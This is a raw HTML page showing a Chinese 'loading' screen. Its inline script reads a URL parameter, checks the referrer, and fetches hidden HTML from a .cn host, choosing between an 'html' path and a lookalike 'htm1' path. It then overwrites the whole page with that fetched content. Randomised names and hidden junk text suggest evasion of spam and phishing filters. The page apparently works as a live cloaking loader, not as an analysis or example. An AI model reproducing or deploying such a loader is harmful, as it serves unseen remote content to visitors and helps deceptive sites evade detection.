<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .P19tPPGW {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .P19tPPGW .vSbH40WLoj {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .P19tPPGW .content {
            line-height: 50px;
            text-align: center
        }

        .P19tPPGW .img {
            width: 100%
        }

        .P19tPPGW .nVM3JDi {
            text-align: center
        }

        .P19tPPGW .nVM3JDi span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .P19tPPGW .nVM3JDi span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .P19tPPGW .nVM3JDi span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .P19tPPGW .nVM3JDi span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .P19tPPGW .nVM3JDi span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .P19tPPGW .nVM3JDi span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .P19tPPGW .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function ApbGrTA0D(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var tciE9 = ApbGrTA0D('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ tciE9 +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ tciE9 +".html?a=share";
		}
		
        GqeJqh5xrY=url+"#"+new Date().getTime();
        GqeJqh5xrY && function() {
            $.get(GqeJqh5xrY, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<li style='display:none' >yoSyvRm9tetN8XlG88ehGHQ2cov8XAbysoTbGM5lXvZD1GVA0jwMkvfLvVVV2ncnKVeOd9ijarwYzFgjrucnplGjf</li>
<b style='display:none' >HBMZ02TgfnctgnQ28J42Oy49fZOAjLYhVhZOFqWqwm3RWLf4aEtWpZR6v</b>
<h1 style='display:none' >kqeAVqKTLri2Ngrmm0bvJIZHG4r1ZaM5LGZDMvhelnSbduZcCN5LAD6wmY0</h1><div class="P19tPPGW">
    <div class="vSbH40WLoj">
        <div class="nVM3JDi">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<li style='display:none' >rRiLJtFeLiX032b</li>
<a  href='#' style='display:none'>ogMuuNActj0YQ56AD9OTknIQFukMBnFsXDGy7R569Rwf4CwbdAmZaV3HdUELEibiqvkhelphQBBBPCkqpRJDD6R</a>
<p  style='display:none'>DcgI2XZqxouduvHqbo2woKNmgseYd0ThZquQfNZ2IKL5C</p>
<h1 style='display:none' >ne80w5F7A3tjJLYDSyMAwmqKtclpFIF0fN5eo4z4bd035t</h1>
<a  href='#' style='display:none'>ogMuuNActj0YQ56AD9OTknIQFukMBnFsXDGy7R569Rwf4CwbdAmZaV3HdUELEibiqvkhelphQBBBPCkqpRJDD6R</a>
<a  href='#' style='display:none'>ogMuuNActj0YQ56AD9OTknIQFukMBnFsXDGy7R569Rwf4CwbdAmZaV3HdUELEibiqvkhelphQBBBPCkqpRJDD6R</a>
<h1 style='display:none' >ne80w5F7A3tjJLYDSyMAwmqKtclpFIF0fN5eo4z4bd035t</h1></body>
</html>